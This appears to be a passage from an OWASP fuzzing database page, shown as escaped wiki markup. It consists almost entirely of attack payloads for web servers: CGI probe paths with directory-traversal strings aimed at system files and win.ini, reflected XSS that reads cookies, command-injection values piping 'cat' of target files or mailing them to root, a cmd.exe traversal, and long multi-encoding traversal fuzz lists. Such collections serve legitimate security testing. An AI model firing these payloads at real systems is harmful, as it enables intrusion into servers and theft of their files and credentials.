htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Windows Directory Traversal   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Windows Directory Traversal   (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}&lt;br /&gt;
%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}&lt;br /&gt;
%c0%ae%c0%ae%c0%af{FILE}&lt;br /&gt;
